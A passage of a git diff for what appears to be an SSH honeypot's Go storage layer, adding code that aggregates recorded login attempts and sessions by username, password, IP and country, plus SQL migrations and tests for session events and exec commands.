return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// topN aggregates login attempts by the given field and returns the top N. Must be called with m.mu held.
|
||||||
|
func (m *MemoryStore) topN(field string, limit int) []TopEntry {
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
var key string
|
||||||
|
switch field {
|
||||||
|
case "username":
|
||||||
|
key = a.Username
|
||||||
|
case "password":
|
||||||
|
key = a.Password
|
||||||
|
case "ip":
|
||||||
|
key = a.IP
|
||||||
|
}
|
||||||
|
counts[key] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(counts))
|
||||||
|
for k, v := range counts {
|
||||||
|
entries = append(entries, TopEntry{Value: k, Count: v})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetRecentSessions(_ context.Context, limit int, activeOnly bool) ([]Session, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
return m.collectSessions(limit, activeOnly, DashboardFilter{}), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredSessions(_ context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
return m.collectSessions(limit, activeOnly, f), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// collectSessions gathers sessions matching filter criteria. Must be called with m.mu held.
|
||||||
|
func (m *MemoryStore) collectSessions(limit int, activeOnly bool, f DashboardFilter) []Session {
|
||||||
|
// Compute event counts and input bytes per session.
|
||||||
|
eventCounts := make(map[string]int)
|
||||||
|
inputBytes := make(map[string]int64)
|
||||||
|
for _, e := range m.SessionEvents {
|
||||||
|
eventCounts[e.SessionID]++
|
||||||
|
if e.Direction == 0 {
|
||||||
|
inputBytes[e.SessionID] += int64(len(e.Data))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var sessions []Session
|
||||||
|
for _, s := range m.Sessions {
|
||||||
|
if activeOnly && s.DisconnectedAt != nil {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if !matchesSessionFilter(s, f) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
sess := *s
|
||||||
|
sess.EventCount = eventCounts[s.ID]
|
||||||
|
sess.InputBytes = inputBytes[s.ID]
|
||||||
|
sessions = append(sessions, sess)
|
||||||
|
}
|
||||||
|
|
||||||
|
if f.SortBy == "input_bytes" {
|
||||||
|
sort.Slice(sessions, func(i, j int) bool {
|
||||||
|
return sessions[i].InputBytes > sessions[j].InputBytes
|
||||||
|
})
|
||||||
|
} else {
|
||||||
|
sort.Slice(sessions, func(i, j int) bool {
|
||||||
|
return sessions[i].ConnectedAt.After(sessions[j].ConnectedAt)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
if limit > 0 && len(sessions) > limit {
|
||||||
|
sessions = sessions[:limit]
|
||||||
|
}
|
||||||
|
return sessions
|
||||||
|
}
|
||||||
|
|
||||||
|
// matchesSessionFilter returns true if the session matches the given filter.
|
||||||
|
func matchesSessionFilter(s *Session, f DashboardFilter) bool {
|
||||||
|
if f.Since != nil && s.ConnectedAt.Before(*f.Since) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Until != nil && s.ConnectedAt.After(*f.Until) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.IP != "" && s.IP != f.IP {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Country != "" && s.Country != f.Country {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Username != "" && s.Username != f.Username {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.HumanScoreAboveZero {
|
||||||
|
if s.HumanScore == nil || *s.HumanScore <= 0 {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetTopExecCommands(_ context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for _, s := range m.Sessions {
|
||||||
|
if s.ExecCommand != nil {
|
||||||
|
counts[*s.ExecCommand]++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(counts))
|
||||||
|
for k, v := range counts {
|
||||||
|
entries = append(entries, TopEntry{Value: k, Count: v})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) CloseActiveSessions(_ context.Context, disconnectedAt time.Time) (int64, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
var count int64
|
||||||
|
t := disconnectedAt.UTC()
|
||||||
|
for _, s := range m.Sessions {
|
||||||
|
if s.DisconnectedAt == nil {
|
||||||
|
s.DisconnectedAt = &t
|
||||||
|
count++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return count, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetAttemptsOverTime(_ context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
var cutoff time.Time
|
||||||
|
if since != nil {
|
||||||
|
cutoff = *since
|
||||||
|
} else {
|
||||||
|
cutoff = time.Now().UTC().AddDate(0, 0, -days)
|
||||||
|
}
|
||||||
|
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
if a.LastSeen.Before(cutoff) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if until != nil && a.LastSeen.After(*until) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
day := a.LastSeen.Format("2006-01-02")
|
||||||
|
counts[day] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
points := make([]TimeSeriesPoint, 0, len(counts))
|
||||||
|
for day, count := range counts {
|
||||||
|
t, _ := time.Parse("2006-01-02", day)
|
||||||
|
points = append(points, TimeSeriesPoint{Timestamp: t, Count: count})
|
||||||
|
}
|
||||||
|
sort.Slice(points, func(i, j int) bool {
|
||||||
|
return points[i].Timestamp.Before(points[j].Timestamp)
|
||||||
|
})
|
||||||
|
return points, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetHourlyPattern(_ context.Context, since, until *time.Time) ([]HourlyCount, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
hourCounts := make(map[int]int64)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
if since != nil && a.LastSeen.Before(*since) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if until != nil && a.LastSeen.After(*until) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
hour := a.LastSeen.Hour()
|
||||||
|
hourCounts[hour] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
counts := make([]HourlyCount, 0, len(hourCounts))
|
||||||
|
for h, c := range hourCounts {
|
||||||
|
counts = append(counts, HourlyCount{Hour: h, Count: c})
|
||||||
|
}
|
||||||
|
sort.Slice(counts, func(i, j int) bool {
|
||||||
|
return counts[i].Hour < counts[j].Hour
|
||||||
|
})
|
||||||
|
return counts, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetCountryStats(_ context.Context) ([]CountryCount, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
if a.Country == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
counts[a.Country] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
result := make([]CountryCount, 0, len(counts))
|
||||||
|
for country, count := range counts {
|
||||||
|
result = append(result, CountryCount{Country: country, Count: count})
|
||||||
|
}
|
||||||
|
sort.Slice(result, func(i, j int) bool {
|
||||||
|
return result[i].Count > result[j].Count
|
||||||
|
})
|
||||||
|
return result, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// matchesFilter returns true if the login attempt matches the given filter. Must be called with m.mu held.
|
||||||
|
func matchesFilter(a *LoginAttempt, f DashboardFilter) bool {
|
||||||
|
if f.Since != nil && a.LastSeen.Before(*f.Since) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Until != nil && a.LastSeen.After(*f.Until) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.IP != "" && a.IP != f.IP {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Country != "" && a.Country != f.Country {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if f.Username != "" && a.Username != f.Username {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredDashboardStats(_ context.Context, f DashboardFilter) (*DashboardStats, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
stats := &DashboardStats{}
|
||||||
|
ips := make(map[string]struct{})
|
||||||
|
for i := range m.LoginAttempts {
|
||||||
|
a := &m.LoginAttempts[i]
|
||||||
|
if !matchesFilter(a, f) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
stats.TotalAttempts += int64(a.Count)
|
||||||
|
ips[a.IP] = struct{}{}
|
||||||
|
}
|
||||||
|
stats.UniqueIPs = int64(len(ips))
|
||||||
|
|
||||||
|
for _, s := range m.Sessions {
|
||||||
|
if f.Since != nil && s.ConnectedAt.Before(*f.Since) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if f.Until != nil && s.ConnectedAt.After(*f.Until) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if f.IP != "" && s.IP != f.IP {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if f.Country != "" && s.Country != f.Country {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
stats.TotalSessions++
|
||||||
|
if s.DisconnectedAt == nil {
|
||||||
|
stats.ActiveSessions++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return stats, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredTopUsernames(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
return m.filteredTopN("username", limit, f), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredTopPasswords(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
return m.filteredTopN("password", limit, f), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredTopIPs(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
type ipInfo struct {
|
||||||
|
count int64
|
||||||
|
country string
|
||||||
|
}
|
||||||
|
agg := make(map[string]*ipInfo)
|
||||||
|
for i := range m.LoginAttempts {
|
||||||
|
a := &m.LoginAttempts[i]
|
||||||
|
if !matchesFilter(a, f) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
info, ok := agg[a.IP]
|
||||||
|
if !ok {
|
||||||
|
info = &ipInfo{}
|
||||||
|
agg[a.IP] = info
|
||||||
|
}
|
||||||
|
info.count += int64(a.Count)
|
||||||
|
if a.Country != "" {
|
||||||
|
info.country = a.Country
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(agg))
|
||||||
|
for ip, info := range agg {
|
||||||
|
entries = append(entries, TopEntry{Value: ip, Country: info.country, Count: info.count})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetFilteredTopCountries(_ context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for i := range m.LoginAttempts {
|
||||||
|
a := &m.LoginAttempts[i]
|
||||||
|
if a.Country == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if !matchesFilter(a, f) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
counts[a.Country] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(counts))
|
||||||
|
for k, v := range counts {
|
||||||
|
entries = append(entries, TopEntry{Value: k, Count: v})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// filteredTopN aggregates login attempts by the given field with filter applied and returns the top N. Must be called with m.mu held.
|
||||||
|
func (m *MemoryStore) filteredTopN(field string, limit int, f DashboardFilter) []TopEntry {
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for i := range m.LoginAttempts {
|
||||||
|
a := &m.LoginAttempts[i]
|
||||||
|
if !matchesFilter(a, f) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
var key string
|
||||||
|
switch field {
|
||||||
|
case "username":
|
||||||
|
key = a.Username
|
||||||
|
case "password":
|
||||||
|
key = a.Password
|
||||||
|
case "ip":
|
||||||
|
key = a.IP
|
||||||
|
}
|
||||||
|
counts[key] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(counts))
|
||||||
|
for k, v := range counts {
|
||||||
|
entries = append(entries, TopEntry{Value: k, Count: v})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries
|
||||||
|
}
|
||||||
|
|
||||||
func (m *MemoryStore) Close() error {
|
func (m *MemoryStore) Close() error {
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|||||||
9
internal/storage/migrations/002_session_events.sql
Normal file
9
internal/storage/migrations/002_session_events.sql
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
CREATE TABLE session_events (
|
||||||
|
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||||
|
session_id TEXT NOT NULL REFERENCES sessions(id) ON DELETE CASCADE,
|
||||||
|
timestamp TEXT NOT NULL,
|
||||||
|
direction INTEGER NOT NULL,
|
||||||
|
data BLOB NOT NULL
|
||||||
|
);
|
||||||
|
|
||||||
|
CREATE INDEX idx_session_events_session_id ON session_events(session_id);
|
||||||
3
internal/storage/migrations/003_add_country.sql
Normal file
3
internal/storage/migrations/003_add_country.sql
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
ALTER TABLE login_attempts ADD COLUMN country TEXT NOT NULL DEFAULT '';
|
||||||
|
ALTER TABLE sessions ADD COLUMN country TEXT NOT NULL DEFAULT '';
|
||||||
|
CREATE INDEX idx_login_attempts_country ON login_attempts(country);
|
||||||
1
internal/storage/migrations/004_add_exec_command.sql
Normal file
1
internal/storage/migrations/004_add_exec_command.sql
Normal file
@@ -0,0 +1 @@
|
|||||||
|
ALTER TABLE sessions ADD COLUMN exec_command TEXT;
|
||||||
3
internal/storage/migrations/005_add_query_indexes.sql
Normal file
3
internal/storage/migrations/005_add_query_indexes.sql
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
CREATE INDEX idx_login_attempts_username ON login_attempts(username);
|
||||||
|
CREATE INDEX idx_login_attempts_password ON login_attempts(password);
|
||||||
|
CREATE INDEX idx_sessions_disconnected_at ON sessions(disconnected_at);
|
||||||
@@ -25,8 +25,8 @@ func TestMigrateCreatesTablesAndVersion(t *testing.T) {
|
|||||||
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
|
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
|
||||||
t.Fatalf("query version: %v", err)
|
t.Fatalf("query version: %v", err)
|
||||||
}
|
}
|
||||||
if version != 1 {
|
if version != 5 {
|
||||||
t.Errorf("version = %d, want 1", version)
|
t.Errorf("version = %d, want 5", version)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Verify tables exist by inserting into them.
|
// Verify tables exist by inserting into them.
|
||||||
@@ -64,8 +64,8 @@ func TestMigrateIdempotent(t *testing.T) {
|
|||||||
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
|
if err := db.QueryRow(`SELECT version FROM schema_version`).Scan(&version); err != nil {
|
||||||
t.Fatalf("query version: %v", err)
|
t.Fatalf("query version: %v", err)
|
||||||
}
|
}
|
||||||
if version != 1 {
|
if version != 5 {
|
||||||
t.Errorf("version = %d after double migrate, want 1", version)
|
t.Errorf("version = %d after double migrate, want 5", version)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -22,7 +22,7 @@ func TestRunRetentionDeletesOldRecords(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Insert a recent login attempt.
|
// Insert a recent login attempt.
|
||||||
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2", ""); err != nil {
|
||||||
t.Fatalf("insert recent attempt: %v", err)
|
t.Fatalf("insert recent attempt: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -4,6 +4,7 @@ import (
|
|||||||
"context"
|
"context"
|
||||||
"database/sql"
|
"database/sql"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"strings"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"github.com/google/uuid"
|
"github.com/google/uuid"
|
||||||
@@ -34,28 +35,29 @@ func NewSQLiteStore(dbPath string) (*SQLiteStore, error) {
|
|||||||
return &SQLiteStore{db: db}, nil
|
return &SQLiteStore{db: db}, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *SQLiteStore) RecordLoginAttempt(ctx context.Context, username, password, ip string) error {
|
func (s *SQLiteStore) RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error {
|
||||||
now := time.Now().UTC().Format(time.RFC3339)
|
now := time.Now().UTC().Format(time.RFC3339)
|
||||||
_, err := s.db.ExecContext(ctx, `
|
_, err := s.db.ExecContext(ctx, `
|
||||||
INSERT INTO login_attempts (username, password, ip, count, first_seen, last_seen)
|
INSERT INTO login_attempts (username, password, ip, country, count, first_seen, last_seen)
|
||||||
VALUES (?, ?, ?, 1, ?, ?)
|
VALUES (?, ?, ?, ?, 1, ?, ?)
|
||||||
ON CONFLICT(username, password, ip) DO UPDATE SET
|
ON CONFLICT(username, password, ip) DO UPDATE SET
|
||||||
count = count + 1,
|
count = count + 1,
|
||||||
last_seen = ?`,
|
last_seen = ?,
|
||||||
username, password, ip, now, now, now)
|
country = ?`,
|
||||||
|
username, password, ip, country, now, now, now, country)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return fmt.Errorf("recording login attempt: %w", err)
|
return fmt.Errorf("recording login attempt: %w", err)
|
||||||
}
|
}
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *SQLiteStore) CreateSession(ctx context.Context, ip, username, shellName string) (string, error) {
|
func (s *SQLiteStore) CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error) {
|
||||||
id := uuid.New().String()
|
id := uuid.New().String()
|
||||||
now := time.Now().UTC().Format(time.RFC3339)
|
now := time.Now().UTC().Format(time.RFC3339)
|
||||||
_, err := s.db.ExecContext(ctx, `
|
_, err := s.db.ExecContext(ctx, `
|
||||||
INSERT INTO sessions (id, ip, username, shell_name, connected_at)
|
INSERT INTO sessions (id, ip, username, shell_name, country, connected_at)
|
||||||
VALUES (?, ?, ?, ?, ?)`,
|
VALUES (?, ?, ?, ?, ?, ?)`,
|
||||||
id, ip, username, shellName, now)
|
id, ip, username, shellName, country, now)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "", fmt.Errorf("creating session: %w", err)
|
return "", fmt.Errorf("creating session: %w", err)
|
||||||
}
|
}
|
||||||
@@ -82,6 +84,16 @@ func (s *SQLiteStore) UpdateHumanScore(ctx context.Context, sessionID string, sc
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) SetExecCommand(ctx context.Context, sessionID string, command string) error {
|
||||||
|
_, err := s.db.ExecContext(ctx, `
|
||||||
|
UPDATE sessions SET exec_command = ? WHERE id = ?`,
|
||||||
|
command, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("setting exec command: %w", err)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error {
|
func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error {
|
||||||
now := time.Now().UTC().Format(time.RFC3339)
|
now := time.Now().UTC().Format(time.RFC3339)
|
||||||
_, err := s.db.ExecContext(ctx, `
|
_, err := s.db.ExecContext(ctx, `
|
||||||
@@ -94,6 +106,115 @@ func (s *SQLiteStore) AppendSessionLog(ctx context.Context, sessionID, input, ou
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetSession(ctx context.Context, sessionID string) (*Session, error) {
|
||||||
|
var sess Session
|
||||||
|
var connectedAt string
|
||||||
|
var disconnectedAt sql.NullString
|
||||||
|
var humanScore sql.NullFloat64
|
||||||
|
var execCommand sql.NullString
|
||||||
|
|
||||||
|
err := s.db.QueryRowContext(ctx, `
|
||||||
|
SELECT id, ip, country, username, shell_name, connected_at, disconnected_at, human_score, exec_command
|
||||||
|
FROM sessions WHERE id = ?`, sessionID).Scan(
|
||||||
|
&sess.ID, &sess.IP, &sess.Country, &sess.Username, &sess.ShellName,
|
||||||
|
&connectedAt, &disconnectedAt, &humanScore, &execCommand,
|
||||||
|
)
|
||||||
|
if err == sql.ErrNoRows {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying session: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sess.ConnectedAt, _ = time.Parse(time.RFC3339, connectedAt)
|
||||||
|
if disconnectedAt.Valid {
|
||||||
|
t, _ := time.Parse(time.RFC3339, disconnectedAt.String)
|
||||||
|
sess.DisconnectedAt = &t
|
||||||
|
}
|
||||||
|
if humanScore.Valid {
|
||||||
|
sess.HumanScore = &humanScore.Float64
|
||||||
|
}
|
||||||
|
if execCommand.Valid {
|
||||||
|
sess.ExecCommand = &execCommand.String
|
||||||
|
}
|
||||||
|
return &sess, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT id, session_id, timestamp, input, output
|
||||||
|
FROM session_logs WHERE session_id = ?
|
||||||
|
ORDER BY timestamp`, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying session logs: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var logs []SessionLog
|
||||||
|
for rows.Next() {
|
||||||
|
var l SessionLog
|
||||||
|
var ts string
|
||||||
|
if err := rows.Scan(&l.ID, &l.SessionID, &ts, &l.Input, &l.Output); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning session log: %w", err)
|
||||||
|
}
|
||||||
|
l.Timestamp, _ = time.Parse(time.RFC3339, ts)
|
||||||
|
logs = append(logs, l)
|
||||||
|
}
|
||||||
|
return logs, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) AppendSessionEvents(ctx context.Context, events []SessionEvent) error {
|
||||||
|
if len(events) == 0 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
tx, err := s.db.BeginTx(ctx, nil)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("begin transaction: %w", err)
|
||||||
|
}
|
||||||
|
defer tx.Rollback()
|
||||||
|
|
||||||
|
stmt, err := tx.PrepareContext(ctx, `
|
||||||
|
INSERT INTO session_events (session_id, timestamp, direction, data)
|
||||||
|
VALUES (?, ?, ?, ?)`)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("preparing statement: %w", err)
|
||||||
|
}
|
||||||
|
defer stmt.Close()
|
||||||
|
|
||||||
|
for _, e := range events {
|
||||||
|
_, err := stmt.ExecContext(ctx, e.SessionID, e.Timestamp.UTC().Format(time.RFC3339Nano), e.Direction, e.Data)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("inserting session event: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return tx.Commit()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *SQLiteStore) GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error) {
|
||||||
|
rows, err := s.db.QueryContext(ctx, `
|
||||||
|
SELECT session_id, timestamp, direction, data
|
||||||
|
FROM session_events WHERE session_id = ?
|
||||||
|
ORDER BY id`, sessionID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("querying session events: %w", err)
|
||||||
|
}
|
||||||
|
defer func() { _ = rows.Close() }()
|
||||||
|
|
||||||
|
var events []SessionEvent
|
||||||
|
for rows.Next() {
|
||||||
|
var e SessionEvent
|
||||||
|
var ts string
|
||||||
|
if err := rows.Scan(&e.SessionID, &ts, &e.Direction, &e.Data); err != nil {
|
||||||
|
return nil, fmt.Errorf("scanning session event: %w", err)
|
||||||
|
}
|
||||||
|
e.Timestamp, _ = time.Parse(time.RFC3339Nano, ts)
|
||||||
|
events = append(events, e)
|
||||||
|
}
|
||||||
|
return events, rows.Err()
|
||||||
|
}
|
||||||
|
|
||||||
func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
|
func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
|
||||||
cutoffStr := cutoff.UTC().Format(time.RFC3339)
|
cutoffStr := cutoff.UTC().Format(time.RFC3339)
|
||||||
|
|
||||||
@@ -105,15 +226,26 @@ func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time)
|
|||||||
|
|
||||||
var total int64
|
var total int64
|
||||||
|
|
||||||
// Delete session logs for old sessions.
|
// Delete session events for old sessions.
|
||||||
res, err := tx.ExecContext(ctx, `
|
res, err := tx.ExecContext(ctx, `
|
||||||
|
DELETE FROM session_events WHERE session_id IN (
|
||||||
|
SELECT id FROM sessions WHERE connected_at < ?
|
||||||
|
)`, cutoffStr)
|
||||||
|
if err != nil {
|
||||||
|
return 0, fmt.Errorf("deleting session events: %w", err)
|
||||||
|
}
|
||||||
|
n, _ := res.RowsAffected()
|
||||||
|
total += n
|
||||||
|
|
||||||
|
// Delete session logs for old sessions.
|
||||||
|
res, err = tx.ExecContext(ctx, `
|
||||||
DELETE FROM session_logs WHERE session_id IN (
|
DELETE FROM session_logs WHERE session_id IN (
|
||||||
SELECT id FROM sessions WHERE connected_at < ?
|
SELECT id FROM sessions WHERE connected_at < ?
|
||||||
)`, cutoffStr)
|
)`, cutoffStr)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return 0, fmt.Errorf("deleting session logs: %w", err)
|
return 0, fmt.Errorf("deleting session logs: %w", err)
|
||||||
}
|
}
|
||||||
n, _ := res.RowsAffected()
|
n, _ = res.RowsAffected()
|
||||||
total += n
|
total += n
|
||||||
|
|
||||||
// Delete old sessions.
|
// Delete old sessions.
|
||||||
@@ -139,6 +271,513 @@ func (s *SQLiteStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time)
|
|||||||
return total, nil
|
return total, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
